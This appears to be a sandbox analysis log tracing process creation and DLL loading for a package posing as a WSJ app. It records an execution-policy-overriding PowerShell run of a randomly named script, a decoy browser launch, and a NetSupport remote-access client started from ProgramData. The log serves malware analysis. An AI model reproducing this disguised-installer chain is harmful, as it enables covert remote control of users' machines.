                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=404 --field-trial-handle=1996,i,16757572502617297566,4553058767684910018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\netsupport\client\client32.exe "C:\ProgramData\netsupport\client\client32.exe"
                                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca
                                    Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy
                                    Source: unknownProcess created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe"
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2012,i,2892533121597599651,11552435548397906284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"Jump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\netsupport\client\client32.exe "C:\ProgramData\netsupport\client\client32.exe"Jump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=404 --field-trial-handle=1996,i,16757572502617297566,4553058767684910018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msvcp140.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: concrt140.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_1.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_1.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.xaml.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dcomp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: rometadata.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windowmanagementapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: inputhost.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dxgi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.applicationmodel.background.systemeventsbroker.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: biwinrt.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: mrmcorer.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: d3d11.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: d3d10warp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dxcore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: d2d1.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: bcp47mrm.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msvcp140_app.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_1_app.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_app.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: execmodelproxy.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: rmclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: uiamanager.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.immersive.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dataexchange.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: winrttracing.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.applicationmodel.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.globalization.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: twinapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: directmanipulation.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: daxexec.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: fltlib.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: container.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: profext.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appcontracts.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cdprt.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cdp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dsreg.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appxpackaging.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msxml6.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptxml.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: webservices.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptowinrt.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptnet.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: certenroll.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: certca.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dsparse.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: threadpoolwinrt.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: ninput.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: installservice.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: msvcp140.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: vcruntime140_1.dllJump to behavior
